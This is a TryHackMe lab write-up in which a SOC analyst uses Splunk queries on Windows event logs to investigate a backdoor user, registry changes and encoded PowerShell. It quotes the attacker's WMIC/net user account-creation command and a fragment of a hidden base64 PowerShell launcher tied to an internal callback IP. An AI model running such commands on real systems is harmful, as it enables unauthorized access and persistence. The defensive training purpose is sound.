Refer to Splunk for the challenge room on TryHackMe

Scenario

SOC Analyst Johny noticed unusual activity in the logs from several Windows machines. It seems that an attacker has gained access to these machines and set up backdoors. Johny's manager has asked him to collect the logs from these suspected machines and add them to Splunk for a quick review.

Task

How many events were collected and Ingested in the index main?
An index is a repository where data is stored and organized for easy retrieval and analysis. By querying the index name, we can view the events contained within it.

index=main

The adversary was successful in creating a backdoor user. What is the new username?
Searching for Event ID 4720 which logs the creation of a new user account in Active Directory.

index=main EventID="4720"
| table Hostname TargetUserName

On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?
We already had the hostname and username. Additionally, Event ID 12 logs modifications to registry keys. By querying the keyword, we can determine the full path.

index=main Hostname="Micheal.Beaven" EventID="12" A1berto
| table Category Hostname EventID TargetObject

Examine the logs and identify the user that the adversary was trying to impersonate.
By using "dedup User" to eliminate duplicate user entries, we can identify all unique user entries in this index, as well as the impersonation.

index=main User="*"
| dedup User
| table User

What is the command used to add a backdoor user from a remote computer?
By searching for the keyword "username" and displaying the matching results in a table, we can easily identify the command used to create the backdoor.

index=main A1berto
| table Commandline

Note: The screenshot displays two commands for creating a user. The first is a WMIC command creates “net user /add A1berto paw0rd1”, which facilitates the remote execution of commands using Windows Management Instrumentation (WMI). In contrast, the second command is a local net user command, net user /add A1berto paw0rd1, which is executed locally and does not support remote user management.

How many times was the login attempt from the backdoor user observed during the investigation?
An examination of all user activities logged by the Windows Event Log or Sysmon shows that the newly created user "A1berto" has not generated any activity.

index=main User="*"
| dedup User
| table User

What is the name of the infected host on which suspicious Powershell commands were executed?
By searching for the keyword "PowerShell" and its associated hostname, we determine the host that executed the suspicious PowerShell command.

index=main PowerShell
| dedup Hostname
| table Hostname

PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?
PowerShell execution is logged in Event IDs 4103 and 4104.
4103 captures the initiation of a PowerShell transcription session, which records all commands and outputs to a text file.
4104 documents the execution of a PowerShell script block, offering detailed information about the specific script content and the context in which it was executed. Together, these logs provide valuable insights into PowerShell activity.

index=main EventID="4103"

An encoded Powershell script from the infected host initiated a web request. What is the full URL?
Upon investigating the results from the previous query (index=main EventID="4103"), I noticed a PowerShell command (powershell.exe -noP -sta -w 1 -enc) that was executed in hidden mode without loading the user profile and utilized base64 encoding.
We have determined that the command is encoded. By pasting it into CyberChef (Decode from base64 and remove null bytes), I discovered another string encoded in base64 FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==').
By decoding the encoded string with CyberChef again, we retrieve the IP address that the infected machine reached to. By appending the uri (/news.php) to the IP address, we’ll get the full URL.